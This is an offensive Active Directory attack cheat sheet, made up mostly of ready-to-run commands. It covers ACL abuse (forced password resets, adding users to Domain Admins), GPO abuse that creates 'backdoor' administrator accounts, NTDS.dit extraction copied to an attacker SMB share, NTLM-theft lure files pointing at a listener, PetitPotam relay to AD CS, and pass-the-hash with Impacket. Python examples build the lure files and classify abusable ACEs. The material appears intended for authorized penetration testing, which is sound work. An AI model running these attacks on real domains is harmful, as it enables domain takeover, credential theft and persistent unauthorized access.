Active Directory Exploitation

📚 This file focuses on AD Enumeration, ACL Abuse, GPO Abuse, Persistence, and AD CS attacks. For specific attack techniques, see the dedicated files linked below.


Quick Reference - Attack Types

Quick Check (One-liner)

# Quick AD enumeration: SMB null session, RootDSE naming contexts, then a user listing with credentials.
# Chain with ';' rather than '&&' so a refused null session does not abort the later checks.
nxc smb $rhost -u '' -p ''; ldapsearch -x -H ldap://$rhost -b "" -s base namingContexts; nxc smb $rhost -u "$user" -p "$pass" --users
| Attack Category | Dedicated File | Key Techniques |
|---|---|---|
| Kerberos Attacks | 3.3.Kerberos-Attacks.md | ASREPRoast, Kerberoasting, Golden/Silver Ticket, DCSync, Delegation |
| NTLM Attacks | 3.4.NTLM-Relay-and-Responder.md | Responder, NTLM Relay, Pass-the-Hash, SMB Relay |
| Password Attacks | 3.2.Password-Attacks.md | hashcat, mimikatz, Credential Dumping, Hash Cracking |
| AD Critical CVEs | CVE-Exploit | ZeroLogon, noPac, Certifried |

AD Critical CVE Quick Reference

| CVE | Name | One-liner Detection |
|---|---|---|
| CVE-2020-1472 | ZeroLogon | `nxc smb $rhost -u '' -p '' -M zerologon` (target must be a DC; the module only tests, it does not reset the machine password) |
| CVE-2021-42278/42287 | noPac | `nxc smb $rhost -u "$user" -p "$pass" -M nopac` (needs a valid domain account) |
| CVE-2022-26923 | Certifried | Requires AD CS; check with `certipy find` |
| CVE-2021-34527 | PrintNightmare | `rpcdump.py $rhost \| grep MS-RPRN` (shows the spooler is exposed, not that the host is unpatched) |

📖 For full exploitation commands, see CVE-Exploit - Windows/AD


Enumeration

Manual Enumeration

net user /domain
net user <USERNAME> /domain
net group /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain

PowerShell AD Module

Get-ADUser -Filter *
Get-ADUser -Identity <USERNAME> -Properties *
Get-ADGroup -Filter *
Get-ADGroupMember "Domain Admins"
Get-ADComputer -Filter * -Properties *

LDAP Enumeration

Install: sudo apt install ldap-utils

Anonymous Bind

# Check if anonymous bind is allowed: the RootDSE (empty base DN) is readable by any bound client,
# so a namingContexts answer here confirms anonymous bind and tells you the real base DN to use below
ldapsearch -x -H ldap://$rhost -b "" -s base namingContexts

# Enumerate with anonymous bind (use a naming context returned above as the base DN)
ldapsearch -x -H ldap://$rhost -b "DC=domain,DC=local" "(objectClass=*)"

Authenticated Enumeration

# List all users
ldapsearch -LLL -x -H ldap://$rhost -D "DOMAIN\user" -w "password" \
  -b "dc=domain,dc=local" -s sub "(objectClass=user)" sAMAccountName

# Users with description (may contain passwords!)
ldapsearch -LLL -x -H ldap://$rhost -D "DOMAIN\user" -w "password" \
  -b "dc=domain,dc=local" -s sub \
  "(&(objectClass=user)(Description=*))" \
  sAMAccountName cn Description memberOf

# Find Domain Admins
ldapsearch -LLL -x -H ldap://$rhost -D "DOMAIN\user" -w "password" \
  -b "dc=domain,dc=local" \
  "(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=local)" \
  sAMAccountName

# Find computers
ldapsearch -LLL -x -H ldap://$rhost -D "DOMAIN\user" -w "password" \
  -b "dc=domain,dc=local" "(objectClass=computer)" \
  name operatingSystem operatingSystemVersion

# Find SPNs (for Kerberoasting)
ldapsearch -LLL -x -H ldap://$rhost -D "DOMAIN\user" -w "password" \
  -b "dc=domain,dc=local" \
  "(&(objectClass=user)(servicePrincipalName=*))" \
  sAMAccountName servicePrincipalName

# Users with Kerberos pre-authentication disabled (ASREPRoast).
# 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND rule; 4194304 (0x400000) is the
# DONT_REQ_PREAUTH bit of userAccountControl. Disabled accounts also match; check for bit 2 (ACCOUNTDISABLE) before roasting.
ldapsearch -LLL -x -H ldap://$rhost -D "DOMAIN\user" -w "password" \
  -b "dc=domain,dc=local" \
  "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
  sAMAccountName userAccountControl
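The bitwise filters above are easy to get wrong (the OID, the decimal flag value, and the disabled-account trap). The following added example, which is not part of the original cheat sheet, decodes raw userAccountControl values, builds the same LDAP filter strings for any combination of flags, and applies the identical bit logic offline to a constructed set of accounts so you can sanity-check a filter before running it against a DC. Flag values are the documented ADS_USER_FLAG constants; the account names and values in SAMPLE are constructed.

```python
"""Decode userAccountControl flags and build the bitwise LDAP filters used above.

Added example, not code from the original cheat sheet. UAC_FLAGS holds the documented
ADS_USER_FLAG constants; 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND.
SAMPLE is constructed data in the shape of {sAMAccountName: userAccountControl}.
"""
UAC_FLAGS = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "LOCKOUT": 0x0010,
    "PASSWD_NOTREQD": 0x0020,
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,               # set on domain controllers
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,            # unconstrained delegation
    "NOT_DELEGATED": 0x100000,
    "DONT_REQ_PREAUTH": 0x400000,                 # ASREPRoastable
    "PASSWORD_EXPIRED": 0x800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # constrained delegation w/ protocol transition
}
BIT_AND = "1.2.840.113556.1.4.803"   # every bit of the mask must be set on the attribute


def decode_uac(value: int) -> list:
    """Names of the flags set in a raw userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def uac_filter(*flags: str, object_class: str = "user", exclude: tuple = ("ACCOUNTDISABLE",)) -> str:
    """LDAP filter for objects that have ALL of `flags` set and none of `exclude`."""
    mask = 0
    for f in flags:
        mask |= UAC_FLAGS[f]
    parts = [f"(objectClass={object_class})", f"(userAccountControl:{BIT_AND}:={mask})"]
    for f in exclude:
        parts.append(f"(!(userAccountControl:{BIT_AND}:={UAC_FLAGS[f]}))")
    return "(&" + "".join(parts) + ")"


def matches(value: int, *flags: str, exclude: tuple = ("ACCOUNTDISABLE",)) -> bool:
    """Offline equivalent of uac_filter(): the same bit test on a value you already hold."""
    mask = 0
    for f in flags:
        mask |= UAC_FLAGS[f]
    return value & mask == mask and not any(value & UAC_FLAGS[f] for f in exclude)


# Constructed sample, as ldapdomaindump / ldapsearch would return it.
SAMPLE = {
    "svc_backup": 0x200 | 0x10000 | 0x400000,  # enabled, password never expires, no pre-auth
    "old_admin":  0x200 | 0x2 | 0x400000,      # no pre-auth but disabled: the AS-REQ is rejected
    "WEB01$":     0x1000 | 0x80000,            # workstation with unconstrained delegation
    "DC01$":      0x2000 | 0x80000,            # DC: always TRUSTED_FOR_DELEGATION, not a finding
    "jdoe":       0x200,
}


def asreproastable(entries: dict) -> list:
    """Enabled accounts with DONT_REQ_PREAUTH set."""
    return sorted(n for n, v in entries.items() if matches(v, "DONT_REQ_PREAUTH"))


def unconstrained_delegation(entries: dict) -> list:
    """Non-DC, enabled accounts trusted for unconstrained delegation."""
    return sorted(n for n, v in entries.items()
                  if matches(v, "TRUSTED_FOR_DELEGATION",
                             exclude=("ACCOUNTDISABLE", "SERVER_TRUST_ACCOUNT")))


if __name__ == "__main__":
    print(uac_filter("DONT_REQ_PREAUTH", exclude=()))
    print(uac_filter("TRUSTED_FOR_DELEGATION", object_class="computer",
                     exclude=("ACCOUNTDISABLE", "SERVER_TRUST_ACCOUNT")))
    print("ASREPRoast:", asreproastable(SAMPLE))
    print("Unconstrained:", unconstrained_delegation(SAMPLE))
    for name, val in SAMPLE.items():
        print(f"{name:12s} {val:#09x} {decode_uac(val)}")
```

`uac_filter("DONT_REQ_PREAUTH", exclude=())` reproduces the filter from the ldapsearch block above exactly; the default `exclude` adds the ACCOUNTDISABLE test so you do not waste cracking time on accounts that cannot obtain an AS-REP, and the computer variant drops DCs, which always carry TRUSTED_FOR_DELEGATION.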

Python ldapdomaindump

# Install
pip install ldapdomaindump

# Dump all AD information
ldapdomaindump -u 'DOMAIN\user' -p 'password' ldap://$rhost -o ldap_dump/

# Creates HTML reports for easy viewing
firefox ldap_dump/domain_users.html

PowerView

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

powershell -ep bypass
. .\PowerView.ps1

Domain Information

Get-NetDomain
Get-NetDomainController
Get-DomainPolicy

User Enumeration

Get-NetUser
Get-NetUser | select cn,pwdlastset,lastlogon
Get-NetUser -SPN | select samaccountname,serviceprincipalname

Group Enumeration

Get-NetGroup | select cn
Get-NetGroup "Domain Admins" | select member
Get-NetGroupMember "Domain Admins"

Computer Enumeration

Get-NetComputer
Get-NetComputer | select operatingsystem,dnshostname

Share Enumeration

Find-DomainShare
Find-DomainShare -CheckShareAccess

ACL Enumeration

Get-ObjectAcl -Identity <USERNAME>
Get-ObjectAcl -Identity "Domain Admins" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

Find Local Admin Access

Find-LocalAdminAccess

BloodHound

BloodHound Python Collector

bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns '<RHOST>' -c all --zip
bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns '<RHOST>' --dns-tcp -c all --zip

SharpHound Collector

.\SharpHound.exe -c All
.\SharpHound.exe -c All --ldapusername <USERNAME> --ldappassword <PASSWORD>

enum4linux-ng

enum4linux-ng $rhost
enum4linux-ng -A $rhost
enum4linux-ng -u '<USERNAME>' -p '<PASSWORD>' $rhost

NTLM Relay & Poisoning

📚 Moved to dedicated file: NTLM Relay & Responder

Covers: Responder setup, NTLM Relay attack, SMB Relay, Pass-the-Hash, NTLMv2 cracking, and mitigation.


ACL Abuse

AllExtendedRights

Grants every extended right on the target object. On a user that includes User-Force-Change-Password (reset the password without knowing the old one); on a computer it allows reading the LAPS password attribute (ms-Mcs-AdmPwd); on the domain object it includes the two DS-Replication-Get-Changes rights that make DCSync possible.

Enumerate with BloodHound

Look for: "AllExtendedRights" edge in BloodHound graph

Enumerate with PowerView

# Find ACEs granting ExtendedRight (AllExtendedRights shows as ExtendedRight with an all-zero ObjectType GUID);
# filter SecurityIdentifier for principals you control
Get-ObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "ExtendedRight" } | select ObjectDN, SecurityIdentifier, ActiveDirectoryRights, ObjectAceType

# Check specific user
Get-ObjectAcl -Identity "TargetUser" -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "ExtendedRight" }

Reset User Password (Linux)

# Using net rpc (from Kali)
net rpc password "target_user" 'NewPassword123!' -U "domain/attacker_user%password" -S $dc_ip

# Verify new credentials
nxc winrm $rhost -u 'target_user' -p 'NewPassword123!' -d domain

Reset User Password (Windows)

# Using PowerView
Set-DomainUserPassword -Identity TargetUser -AccountPassword (ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force) -Verbose

# Using net command
net user TargetUser NewPassword123! /domain

GenericAll / GenericWrite

GenericAll is full control over the object: password reset, any attribute write, DACL and owner changes. GenericWrite only covers writing attributes (servicePrincipalName, scriptPath, msDS-KeyCredentialLink) and does not include password reset or DACL changes. When the target is a group, either right (or WriteProperty on the member attribute) lets you add members.

Enumerate

Get-ObjectAcl -Identity "TargetUser" -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "GenericAll|GenericWrite" }

Abuse - Add to Group

# Add user to Domain Admins (requires GenericAll/GenericWrite/WriteProperty on the group object itself)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'AttackerUser' -Verbose

Abuse - Set SPN for Kerberoasting

# Set fake SPN on user for Kerberoasting
Set-DomainObject -Identity TargetUser -SET @{serviceprincipalname='nonexistent/YOURSERVICENAME'}

# Now Kerberoast that user
Get-DomainUser TargetUser | Get-DomainSPNTicket | select -expand Hash

WriteDacl

Can rewrite the object's DACL to grant yourself further rights (WriteOwner is equivalent in practice: take ownership, then rewrite the DACL)

# Grant yourself GenericAll (current PowerView name is Add-DomainObjectAcl; -Rights also accepts ResetPassword, WriteMembers and, on the domain object, DCSync)
Add-ObjectAcl -TargetIdentity TargetUser -PrincipalIdentity AttackerUser -Rights All

ForceChangePassword

Can reset password without knowing current password

# Using rpcclient
rpcclient -U 'attacker_user%password' $dc_ip
rpcclient $> setuserinfo2 target_user 23 'NewPassword123!'
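The ACE-to-primitive mapping in the AllExtendedRights, GenericAll/GenericWrite, WriteDacl and ForceChangePassword subsections above is what BloodHound computes from raw security descriptors. The following added example (not from the original page, nor PowerView's or BloodHound's code) does that classification over a constructed list of ACEs shaped like Get-ObjectAcl output: it decodes the access mask, resolves the ObjectType GUID to the attribute or extended right it scopes, and says which abuse each ACE enables. The access-mask bits are the ADS_RIGHT_* constants and the GUIDs are the AD schema / extended-right GUIDs; the principals, DNs and ACEs in SAMPLE_ACES are constructed.

```python
"""Map AD ACEs to the abuse primitives described in this section.

Added example, not part of the original page. Access-mask bits are the ADS_RIGHT_*
constants (the same values PowerView's ActiveDirectoryRights enum decodes); the
ObjectType GUIDs are the AD schema / extended-right GUIDs. SAMPLE_ACES is constructed
data shaped like Get-ObjectAcl output with SecurityIdentifier resolved to a name.
"""
RIGHTS = {
    "CreateChild": 0x1, "DeleteChild": 0x2, "ListChildren": 0x4, "Self": 0x8,
    "ReadProperty": 0x10, "WriteProperty": 0x20, "DeleteTree": 0x40, "ListObject": 0x80,
    "ExtendedRight": 0x100, "Delete": 0x10000, "ReadControl": 0x20000,
    "WriteDacl": 0x40000, "WriteOwner": 0x80000,
}
GENERIC_ALL = 0xF01FF
GENERIC_WRITE = 0x20028           # ReadControl | WriteProperty | Self
NULL_GUID = "00000000-0000-0000-0000-000000000000"   # "all properties" / "all extended rights"
GUIDS = {
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "bf9679c0-0de6-11d0-a285-00aa003049e2": "member",
    "f3a64788-5306-11d1-a9c5-0000f80367c1": "servicePrincipalName",
    "5b47d60f-6090-40b2-9f37-2a4de88f3063": "msDS-KeyCredentialLink",
}


def decode_mask(mask: int) -> list:
    """Right names for an access mask, collapsing the generic combinations like PowerView does."""
    if mask & GENERIC_ALL == GENERIC_ALL:
        return ["GenericAll"]
    names = [n for n, b in RIGHTS.items() if mask & b]
    if mask & GENERIC_WRITE == GENERIC_WRITE:
        names.insert(0, "GenericWrite")
    return names


def classify(ace: dict) -> set:
    """Abuse primitives one ACCESS_ALLOWED ACE grants, given the class of the target object."""
    mask = ace["mask"]
    guid = ace.get("object_type", NULL_GUID).lower()
    attr = GUIDS.get(guid)
    generic_all = mask & GENERIC_ALL == GENERIC_ALL
    write_all_props = bool(mask & RIGHTS["WriteProperty"]) and guid == NULL_GUID
    all_ext_rights = bool(mask & RIGHTS["ExtendedRight"]) and guid == NULL_GUID

    def can_write(name):   # WriteProperty scoped to this attribute, or to all, or GenericAll
        return generic_all or write_all_props or (mask & RIGHTS["WriteProperty"] and attr == name)

    def has_ext(name):     # ExtendedRight scoped to this right, or AllExtendedRights, or GenericAll
        return generic_all or all_ext_rights or (mask & RIGHTS["ExtendedRight"] and attr == name)

    out = set()
    if generic_all:
        out.add("GenericAll")
    if mask & RIGHTS["WriteDacl"]:
        out.add("WriteDacl")
    if mask & RIGHTS["WriteOwner"]:
        out.add("WriteOwner")
    if ace["target_class"] == "user":
        if has_ext("User-Force-Change-Password"):
            out.add("ForceChangePassword")
        if can_write("servicePrincipalName"):
            out.add("TargetedKerberoast")
        if can_write("msDS-KeyCredentialLink"):
            out.add("ShadowCredentials")
    elif ace["target_class"] == "group":
        if can_write("member"):
            out.add("AddMember")
    elif ace["target_class"] == "domain":
        # a single ACE yields DCSync only if it covers both rights (GenericAll / AllExtendedRights)
        if has_ext("DS-Replication-Get-Changes") and has_ext("DS-Replication-Get-Changes-All"):
            out.add("DCSync")
    return out


def dcsync_capable(aces: list, principal: str) -> bool:
    """DCSync needs both replication rights on the domain head; they often sit in separate ACEs."""
    have = set()
    for ace in aces:
        if ace["principal"] != principal or ace["target_class"] != "domain":
            continue
        if "DCSync" in classify(ace):
            return True
        if ace["mask"] & RIGHTS["ExtendedRight"]:
            have.add(GUIDS.get(ace.get("object_type", NULL_GUID).lower()))
    return {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"} <= have


SAMPLE_ACES = [   # constructed
    {"principal": "CORP\\helpdesk", "target": "CN=jdoe,CN=Users,DC=corp,DC=local",
     "target_class": "user", "mask": 0x100, "object_type": "00299570-246d-11d0-a768-00aa006e0529"},
    {"principal": "CORP\\svc_sync", "target": "DC=corp,DC=local", "target_class": "domain",
     "mask": 0x100, "object_type": "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},
    {"principal": "CORP\\svc_sync", "target": "DC=corp,DC=local", "target_class": "domain",
     "mask": 0x100, "object_type": "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
    {"principal": "CORP\\webadmins", "target": "CN=Domain Admins,CN=Users,DC=corp,DC=local",
     "target_class": "group", "mask": 0x40000},
    {"principal": "CORP\\jdoe", "target": "CN=svc_web,CN=Users,DC=corp,DC=local",
     "target_class": "user", "mask": 0x20028},
]


def report(aces: list) -> dict:
    """{(principal, target): sorted primitives} for every ACE that yields something abusable."""
    out = {}
    for ace in aces:
        prims = classify(ace)
        if prims:
            out.setdefault((ace["principal"], ace["target"]), set()).update(prims)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for (who, what), prims in report(SAMPLE_ACES).items():
        print(f"{who:16s} -> {what}: {prims}")
    print("svc_sync DCSync:", dcsync_capable(SAMPLE_ACES, "CORP\\svc_sync"))
```

Two things the example makes visible that the subsection headings hide: GenericWrite (0x20028) on a user gives targeted Kerberoasting and Shadow Credentials but not ForceChangePassword, and DCSync is usually two ACEs (0x100 with each replication GUID) that must be correlated per principal rather than one edge.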

GPO Abuse

SharpGPOAbuse

https://github.com/byronkg/SharpGPOAbuse

Abuse Group Policy Object permissions to escalate privileges.

Check GPO Permissions

# Using the GroupPolicy (RSAT) module
Get-GPPermission -Name "Default Domain Policy" -All

# Using PowerView: find GPO objects where a principal holds edit-level rights
# (WriteProperty/WriteDacl/WriteOwner/GenericAll/GenericWrite; BloodHound calls this GpoEditDeleteModifySecurity).
# Filter SecurityIdentifier for SIDs you control.
Get-NetGPO | % { Get-ObjectAcl -ResolveGUIDs -Name $_.Name } | ? { $_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner|GenericAll|GenericWrite" }

Add Local Admin via GPO

# Add a user to the local Administrators group on every machine the GPO is linked to (replace CurrentUser with your account)
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount CurrentUser --GPOName "Default Domain Policy"

# Force GPO update: this runs on the client, so it only helps where you already have a session.
# Otherwise wait for the background refresh (90 minutes plus a random offset by default).
gpupdate /force

Add Immediate Scheduled Task

# Create scheduled task that runs as SYSTEM
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Backdoor" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add && net localgroup administrators backdoor /add" --GPOName "Vulnerable GPO"

Add User Rights

# Grant SeDebugPrivilege to user
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeDebugPrivilege" --UserAccount AttackerUser --GPOName "Target GPO"

pyGPOAbuse (Linux)

https://github.com/Hackndo/pyGPOAbuse

# Install
pip install pygpoabuse

# Add scheduled task (runs as SYSTEM)
python3 pygpoabuse.py $domain/$user:$pass -gpo-id <GPO-GUID> -command "net user hacker Password123! /add && net localgroup administrators hacker /add" -dc-ip $rhost

# Add local admin
python3 pygpoabuse.py $domain/$user:$pass -gpo-id <GPO-GUID> -localadmin -dc-ip $rhost

GPO Enumeration

# List all GPOs (GroupPolicy module; PowerView equivalent is Get-NetGPO / Get-DomainGPO)
Get-GPO -All

# Get GPO details
Get-GPOReport -Name "Default Domain Policy" -ReportType Html -Path "gpo_report.html"

# Find writable GPOs with BloodHound
MATCH (u:User {name:"ATTACKER@DOMAIN.COM"})-[r:GenericWrite|GenericAll|WriteProperty|Owns]->(g:GPO) RETURN u,r,g

NTLM Theft

ntlm_theft

https://github.com/Greenwolf/ntlm_theft

Generate files that trigger NTLM authentication when opened/accessed.

Generate All File Types

python3 ntlm_theft.py -g all -s $lhost -f TriggerFile

Generate Specific Types

# LNK file (shortcut) - triggers when folder is browsed
python3 ntlm_theft.py -g lnk -s $lhost -f Important

# SCF file (Shell Command File)
python3 ntlm_theft.py -g scf -s $lhost -f Important

# URL file
python3 ntlm_theft.py -g url -s $lhost -f Important

# Office documents
python3 ntlm_theft.py -g docx -s $lhost -f Important
python3 ntlm_theft.py -g xlsx -s $lhost -f Important

Upload to Writable Share

# Upload the .lnk to a share users actually browse (null session shown; add -U 'user%pass' otherwise)
smbclient -N //$rhost/ShareName
smb: \> put Important.lnk

Capture with Responder

# Start Responder before uploading (use the interface facing the target network)
sudo responder -I tun0

# When a user opens the folder in Explorer, it fetches the icon from your host and the NTLMv2 response is captured
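The trigger files in the ntlm_theft section above are small text formats whose icon path points at a UNC share on the listener; the following added example, which is not code from the original page or the ntlm_theft project, builds the SCF, URL and desktop.ini variants so the mechanism is visible, and then does the defender-side hunt: scan a share listing for icon references to hosts outside the trusted set, which is how planted lures of this kind are found. LISTENER and the SHARE listing are constructed values.

```python
"""Build the SCF / URL / desktop.ini trigger files ntlm_theft generates, and hunt for them.

Added example, not from the page or the ntlm_theft project. Each file carries an icon
path on a UNC share; when Explorer renders the containing folder it fetches the icon and
authenticates to that host with NTLM. LISTENER and SHARE are constructed values.
"""
import re

LISTENER = "10.10.14.5"   # constructed: attacker host running Responder


def scf_file(listener: str, name: str = "pwn") -> str:
    # Shell Command File. Current Windows 10/11 Explorer builds generally no longer fetch SCF
    # icons from shares, so on patched targets prefer .lnk / .url.
    return ("[Shell]\r\nCommand=2\r\nIconFile=\\\\%s\\share\\%s.ico\r\n"
            "[Taskbar]\r\nCommand=ToggleDesktop\r\n" % (listener, name))


def url_file(listener: str, name: str = "pwn") -> str:
    # Internet shortcut; the IconFile UNC path is resolved when the folder is displayed.
    return ("[InternetShortcut]\r\nURL=https://example.invalid\r\nWorkingDirectory=C:\\\r\n"
            "IconFile=\\\\%s\\share\\%s.ico\r\nIconIndex=1\r\n" % (listener, name))


def desktop_ini(listener: str, name: str = "pwn") -> str:
    # A desktop.ini makes Explorer load the folder's own icon from the UNC path.
    return "[.ShellClassInfo]\r\nIconResource=\\\\%s\\share\\%s.ico,0\r\n" % (listener, name)


# Icon directives pointing at a UNC host: capture the host part.
UNC_ICON_RE = re.compile(r"^(?:IconFile|IconResource)\s*=\s*\\\\([^\\\r\n]+)\\", re.I | re.M)


def unc_icon_hosts(text: str) -> list:
    """Hosts referenced by UNC icon paths in a file's content."""
    return sorted(set(UNC_ICON_RE.findall(text)))


def suspicious_files(files: dict, trusted_hosts: set) -> list:
    """Hunt over {filename: content}; flag icon references to hosts outside the trusted set."""
    hits = []
    for fname, content in files.items():
        for host in unc_icon_hosts(content):
            if host.lower() not in trusted_hosts:
                hits.append((fname, host))
    return sorted(hits)


SHARE = {   # constructed listing of a writable share
    "Important.scf": scf_file(LISTENER),
    "Important.url": url_file(LISTENER),
    "desktop.ini": "[.ShellClassInfo]\r\nIconResource=\\\\fs01.corp.local\\icons\\team.ico,0\r\n",
    "notes.txt": "IconFile is just a word in this sentence\r\n",
}

if __name__ == "__main__":
    print(scf_file(LISTENER))
    print(url_file(LISTENER))
    print("Lures pointing off-domain:", suspicious_files(SHARE, {"fs01.corp.local"}))
```

The hunt is deliberately host-based rather than extension-based: a legitimate desktop.ini on a corporate file server is normal, while any IconFile or IconResource line resolving to a host that is not yours is the indicator, whatever the file is called.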

Inveigh (PowerShell)

Windows-based LLMNR/NBT-NS poisoner - See also: NTLM Relay & Responder

# Import module
Import-Module .\Inveigh.ps1

# Start capturing
Invoke-Inveigh -FileOutput Y -FileOutputDirectory C:\Temp\

Kerberos Attacks & Credential Harvesting

📚 Moved to dedicated file: Kerberos Attacks

Covers: ASREPRoast, Kerberoasting, Golden Ticket, Silver Ticket, DCSync, Constrained/Unconstrained Delegation, Pass the Ticket, Overpass the Hash


Persistence

Shadow Copies

Extract NTDS.dit from a Domain Controller via Volume Shadow Copy. The krbtgt hash it yields is what Golden Ticket persistence is built on; the remaining hashes give you every account in the domain.

Create Shadow Copy (Requires DA)

# Connect to the DC as Domain Admin (vssadmin create shadow is only available on Server editions, which DCs are)
vssadmin Create Shadow /For=C: /AutoRetry=2

# Note the shadow copy device name from the output (e.g., \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2)

Extract NTDS.dit

# Copy NTDS.dit from shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

# Export SYSTEM hive (required for decryption)
reg.exe save hklm\system c:\system.bak

Transfer & Extract Hashes

# Setup SMB server on Kali
impacket-smbserver kali . -username kali -password kali -smb2support

# From DC, copy files to attacker
# net use \\$lhost\kali /user:kali kali
# copy c:\ntds.dit.bak \\$lhost\kali\
# copy c:\system.bak \\$lhost\kali\

# Extract hashes
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

NTDS.dit Extraction

Remote via Impacket (Recommended)

# Extract all hashes remotely. Without -use-vss, -just-dc pulls secrets over DRSUAPI replication (DCSync),
# which needs DA/replication rights but writes nothing to the DC's disk; -use-vss instead creates a shadow copy
# on the DC and copies NTDS.dit over SMB (noisier, but works when the replication RPC is blocked)
impacket-secretsdump -just-dc $domain/<USERNAME>:<PASSWORD>@$rhost -use-vss

# Extract specific user
impacket-secretsdump -just-dc-user Administrator $domain/<USERNAME>:<PASSWORD>@$rhost

# With hash authentication
impacket-secretsdump -just-dc $domain/<USERNAME>@$rhost -hashes :<NTLM_HASH>

NetExec

# Dump NTDS
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' -d $domain --ntds

# With hash
nxc smb $rhost -u '<USERNAME>' -H '<NTLM_HASH>' -d $domain --ntds

AD CS (Certificate Services)

Certipy

https://github.com/ly4k/Certipy

Find Vulnerable Templates

certipy find -u "<USERNAME>@$domain" -p '<PASSWORD>' -dc-ip $rhost -vulnerable -stdout

ESC1: Misconfigured Certificate Templates

The template lets the enrollee supply the subject (ENROLLEE_SUPPLIES_SUBJECT), carries a client-authentication EKU, and low-privileged users may enroll. -ca is the CA name, -target the CA server hostname.

certipy req -ca '<CA>' -username "<USERNAME>@$domain" -password '<PASSWORD>' -target '<CA-HOST>' -template '<TEMPLATE>' -upn "Administrator@$domain"
certipy auth -pfx Administrator.pfx -dc-ip $rhost

ESC4: Vulnerable Certificate Template Access Control

You have write access to the template object. certipy template rewrites it into an ESC1-vulnerable configuration; -save-old keeps a JSON copy of the original, which you should restore afterwards with the same command and -configuration <TEMPLATE>.json.

certipy template -username "<USERNAME>@$domain" -password '<PASSWORD>' -template '<TEMPLATE>' -save-old
certipy req -ca '<CA>' -username "<USERNAME>@$domain" -password '<PASSWORD>' -target '<CA-HOST>' -template '<TEMPLATE>' -upn "Administrator@$domain"
certipy auth -pfx Administrator.pfx -dc-ip $rhost

ESC8: NTLM Relay to AD CS HTTP Endpoints

The web enrollment endpoint (certsrv) accepts NTLM without Extended Protection, so a coerced DC authentication can be relayed to it to obtain a certificate for the DC machine account. PetitPotam takes the listener (your relay host) first and the target DC second.

certipy relay -target 'http://<CA-HOST>'
python3 PetitPotam.py $lhost $rhost
certipy auth -pfx dc.pfx -dc-ip $rhost

Defense Evasion

📚 Moved to Windows Command - Defense Evasion

Covers: AMSI Bypass, ETW Bypass, Script Block Logging Bypass, AppLocker Bypass


Impacket Tools Quick Reference

📖 For detailed Impacket usage in lateral movement context, see Lateral Movement

impacket-secretsdump

impacket-secretsdump $domain/<USERNAME>@$rhost
impacket-secretsdump -dc-ip $rhost $domain/<USERNAME>:<PASSWORD>@$rhost
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
impacket-secretsdump -ntds ntds.dit -system system LOCAL

impacket-psexec

impacket-psexec <USERNAME>@$rhost
impacket-psexec $domain/Administrator@$rhost -hashes :<NTLM_HASH>

impacket-wmiexec

impacket-wmiexec $domain/<USERNAME>:<PASSWORD>@$rhost
impacket-wmiexec -hashes :<NTLM_HASH> Administrator@$rhost

impacket-smbexec

impacket-smbexec $domain/<USERNAME>:<PASSWORD>@$rhost

impacket-getTGT

impacket-getTGT $domain/<USERNAME>:<PASSWORD>
impacket-getTGT $domain/<USERNAME> -hashes :<NTLM_HASH>
export KRB5CCNAME=<USERNAME>.ccache

impacket-GetUserSPNs

impacket-GetUserSPNs $domain/<USERNAME>:<PASSWORD> -dc-ip $rhost -request

impacket-GetNPUsers

impacket-GetNPUsers $domain/ -dc-ip $rhost -usersfile users.txt -no-pass -format hashcat -outputfile hashes.asreproast

impacket-addcomputer

impacket-addcomputer -dc-ip $rhost -computer-name FAKEPC -computer-pass 'Password123!' $domain/<USERNAME>:<PASSWORD>

AD Attack Quick Reference

Attack Flow Based on Access Level

| Access Level | Available Attacks |
|---|---|
| Domain User + DC Reachable | PowerView enumeration, BloodHound, ACL enumeration, Domain shares, Password spraying, AS-REP Roasting, Kerberoasting |
| Local Admin on Domain Machine | Cached credentials (secretsdump), mimikatz, LSASS dump |
| Domain Admin + DC Reachable | DCSync, NTDS.dit extraction, Golden Ticket creation |
